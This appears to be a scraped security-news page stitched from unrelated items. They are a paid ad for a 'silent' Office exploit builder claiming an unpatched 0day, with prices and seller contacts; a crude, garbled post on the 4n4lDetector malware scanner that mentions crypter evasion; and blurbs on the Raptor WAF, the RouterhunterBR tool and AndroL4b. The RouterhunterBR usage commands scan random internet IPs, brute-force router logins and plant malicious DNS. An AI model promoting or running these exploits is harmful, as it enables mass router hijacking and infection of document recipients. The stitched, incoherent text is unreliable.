I Don't Sell (CC, CVV, Bank Logins, WU Transfers, PayPal, eBay and Other Accounts). I am a Pentester and Hacker, Not a Carder. Some N00bs use my name to Scam and Rip.

Universal Silent Exploit Builder for Office: 2003, 2007, 2010, 2013
Windows: XP, Vista, 7, 8, 8.1, 10
Bits: 32-bit and 64-bit
This is SILENT! Not Macros. Based on https://www.cvedetails.com/cve/CVE-2015-2470/, https://www.cvedetails.com/cve/CVE-2015-6172/ and another one, which is not officially documented in the Microsoft base and not patched yet (0day).

Demonstration USEB on :

Windows 10 Pro 64bit and Office 2013(64bit):

Windows 8.1 64bit and Office 2013(32bit): 

Windows 7 64bit and Office 2013(32bit): 

Word: http://viruscheckmate.com/free/#/taskID/aq7Cx2BJmblC
Excel: http://viruscheckmate.com/free/#/taskID/OQZfGdPT48rT

1 month with automatic updates - 1200 USD (private stub 200 USD)
3 months with automatic updates (private stub 400 USD) - 2400 USD. Discounts available.

Terms Of Service: 
1. You are not allowed to share/leak the product.
2. You are not allowed to resell the product.
3. You are not allowed to open exploit service based on my builder.
4. There are no refunds. All sales are final.
5. I am in no way responsible how you use this exploit.
6. Scanning it on Virus Distribution Sites will result in permanent ban.
7. I can change ToS any time I want.
8. By purchasing the product you accept this ToS.
9. About problems and questions you need to contact me on my Jabber writer@darkjabber.cc - z3r0@exploit.im - Yahoo internet.zer0@yahoo.com - Skype internet.zero

4n4lDetector v1.1

Fuck what fucking time ago out there!  Now it is the awkward moment when everyone is back to haunt you. If you get into bed and I enfold, raisins heat. If you poke a foot by the end of the sheet, you run the risk of losing the little freeze. If you come out on long pants, even gayumbos merge with the cheeks of your buttocks, and this with perspiration your balls become number one public enemy. Why you the start to sweat all! And if Instead decide to spend the shorts ... date by fucked because something bad has to happen to you, you listen to me ...  this is a no live!

The truth is that I do not want to write the post jajajaa pffffffff ... rather be thrown into the little sun on my terrace sucking flash pole , but as alternatives after a weekend so I was only movidito post something or enter Putalocura , and I know what will be happening, but lately not updated with good content, for that ... I'm losing interest.

So I said ... I will give them to the kids and especially the broads, the new version of my software 4n4lDetector. Jokes aside, I have devoted many hours to make it even more powerful than the previous version, and if I say that I am very happy with the results that this tool is giving me not deceived you. Also I do not have to sell you anything, because everything with me always is free.

What new things brings this version of 4n4lDetector?

You may recall my previous post, in which I developed a Crypter to make malware undetectable. It used a stub called enelpc.exe; after running 4n4lCrypter, the resulting file, Crypt.exe, carries the encrypted malware. This is the result of dragging both executables onto the tool.

I have included a routine for detecting Droppers, which works on Binder and Joiner applications and on stub-based Crypters.

Staying with Crypters: one of those published on indetectables.net by the user MaggicianCOr was further modified by him. I decided to download it, use it and check the encrypted binary, which makes a good example for showing other information that 4n4lDetector provides.

This new version looks for a possible abundance of strange characters, usually generated randomly by malware to add polymorphism to the descriptions of the generated binary. The following image shows a polymorphism detection, followed by the amount of Dropper code and the anomaly after the Entry Point, where a conditional jump (JPO) is found, which betrays the modification of an executable compiled in Visual Basic 6.

You may remember the post in which we encrypted malware by hand: rotation, addition, subtraction and XOR instructions were included after the Entry Point of the Poison Ivy trojan. These also draw the attention of 4n4lDetector, which studies the first 25 bytes from the entry point of every application.

Something that could not be missing from the execution module is the ability to load libraries. For this, the new version adds a new executable of only 2.7 KB, to study their Memory Dumps.

The algorithms responsible for finding executable names have also been improved, so this section now gives broader and better information.

A user asked me to keep the extractions in a log, so I added a console function to the tool: if the name of the executable to be analyzed is passed as a parameter, without quotes of any kind, it generates a TXT file in the root of 4n4lDetector named after the application being analyzed.

Something I had never mentioned on the blog are the Call API By Name and Call API By Hash methods. They are used to invoke APIs without declaring them as such: a hash is used as the name by which to refer to an API, or the functions are called directly by loading libraries with LoadLibrary and memory-copy instructions. Malware can use these techniques to hide from static analysis which functions it actually uses, so it seemed a good idea to incorporate detection of these methods. The figure below shows a simple Downloader camouflaging the URLDownloadToFile API.

It feels strange to develop antivirus-evasion methods and malware as a hobby and, in turn, to fight them as a hobby, lol
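As an added example (not part of 4n4lDetector or of the original post), one way a static scanner can flag the Call By Hash and Call By Name methods described above. The ROR-13 hash scheme, the watchlist and the sample bytes are assumptions constructed for illustration; the post does not say which hash algorithms 4n4lDetector recognises.

```python
import struct

# Hypothetical watchlist; a real one would cover every export of the DLLs of interest.
WATCHLIST = ["LoadLibraryA", "GetProcAddress", "URLDownloadToFileA",
             "VirtualAlloc", "WinExec"]

def ror13_hash(name):
    """ROR-13 additive hash of an ASCII API name (assumed scheme, see lead-in)."""
    h = 0
    for byte in name.encode("ascii"):
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF   # rotate right by 13 bits
        h = (h + byte) & 0xFFFFFFFF
    return h

def find_hashed_apis(data, names=WATCHLIST, hash_fn=ror13_hash):
    """Call By Hash: (offset, api) for every 32-bit little-endian constant in
    data that equals the hash of a watched API name."""
    table = {hash_fn(n): n for n in names}
    hits = []
    for off in range(len(data) - 3):
        (value,) = struct.unpack_from("<I", data, off)
        if value in table:
            hits.append((off, table[value]))
    return hits

def find_undeclared_names(data, imported=(), names=WATCHLIST):
    """Call By Name: (offset, api) for every watched API name stored as a
    NUL-terminated string in data although the import list does not declare it."""
    declared = {n.lower() for n in imported}
    hits = []
    for name in names:
        if name.lower() in declared:
            continue
        needle = name.encode("ascii") + b"\x00"
        off = data.find(needle)
        while off != -1:
            hits.append((off, name))
            off = data.find(needle, off + 1)
    return sorted(hits)

# Constructed sample, not taken from any real binary: NOP padding, a
# `push imm32` carrying a hashed API name, an indirect call, a bare API name.
SAMPLE_IMPORTS = ["LoadLibraryA", "GetProcAddress"]
SAMPLE = (b"\x90" * 4 + b"\x68" + struct.pack("<I", ror13_hash("URLDownloadToFileA"))
          + b"\xff\xd5" + b"WinExec\x00" + b"\x00" * 4)

if __name__ == "__main__":
    print(find_hashed_apis(SAMPLE))
    print(find_undeclared_names(SAMPLE, SAMPLE_IMPORTS))
```

A hit is a lead for manual review rather than a verdict, and other hash schemes can be checked by passing a different `hash_fn`.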


Raptor is an open source tool whose focus is the study of attacks and finding intelligent ways to block them.

Raptor is written in pure C and does not use regex or other common ways of blocking attacks. It is different and fast, like a raptor dinosaur, and follows the KISS principle (Keep It Simple). You can use Raptor to simulate attacks and bypasses against WAFs.

WAF stands for Web Application Firewall. It is widely used nowadays to detect and defend SQL Injections and XSS...
  • You can block XSS, SQL injection attacks and path traversal with Raptor
  • You can use a blacklist of IPs to block some users at config/blacklist_ip.txt
  • You can use IPv6 and IPv4 for communications
  • In the future: DoS protector, request limit, rule interpreter and malware detector for uploads.
  • In the future: SSL/TLS...

To run:

$ git clone https://github.com/CoolerVoid/raptor_waf
$ cd raptor_waf; make; bin/raptor


Bring up an HTTPd server on port 80:
$ bin/Raptor -h localhost -p 80 -r 8883 -w 4 -o loglog.txt
You can test at http://localhost:8883/test.php

See the docs



Of 509 attacks, 349 were detected and blocked: 68% of attacks blocked.


RouterhunterBR is an automated security tool that finds vulnerabilities and performs tests on routers and vulnerable devices on the Internet. RouterhunterBR was designed to run over the Internet, scanning defined IP ranges or random IPs, in order to automatically exploit the DNSChanger vulnerability on home routers.

DNSChanger is a trojan able to direct user requests to illegal sites. In practice, this malware can change the DNS settings of a machine, redirecting the user to sites with malicious purposes. Imagine, for example, that your system is infected with this malware: a user trying to access a particular site (e.g. Facebook.com) may be forwarded to an unsolicited and potentially illegal website.

The script exploits four vulnerabilities in routers


import sys, os, argparse, itertools, requests, random, time, threading, base64, socket
from datetime import datetime


  -range, --range                                  Set range of IP
  -bruteforce, --bruteforce                        Performs brute force with standard users and passwords, and soon after defines the malicious DNS.
  -startip 192.168.*.*, --startip 192.168.*.*      Start - IP range customized with wildcard / 201.*.*.*
  -endip 192.168.*.*, --endip 192.168.*.*          End - IP range customized with wildcard / 201.*.*.*
  -dns1, --dns1                                    Define malicious dns1
  -dns2, --dns2                                    Define malicious dns2
  --threads 10                                     Set number of threads
  -rip, --randomip                                 Randomize router IPs
  -lmtip 10, --limitip 10                          Define limit of random IPs


Random IPs:
python routerhunter.py --dns1 --dns2 --randomip --limitip 10 --threads 10
python routerhunter.py --dns1 --dns2 -rip -lmtip 10 --threads 10
Scanner in IP range:
python routerhunter.py --dns1 --dns2 --range --threads 10
IP range customized with wildcard / Ex: --startip 201.*.*.* - --endip 201.*.*.*
python routerhunter.py --dns1 --dns2 --startip 192.168.*.* --endip 192.168.*.* --threads 10
Brute force with users and passwords on routers that require authentication, forcing alteration of DNS - DSLink 260E:
python routerhunter.py --dns1 --dns2 --range --bruteforce --threads 10


AndroL4b is an Android security virtual machine based on Ubuntu MATE. It includes a collection of the latest frameworks, tutorials and labs from different security geeks and researchers, for reverse engineering and malware analysis.

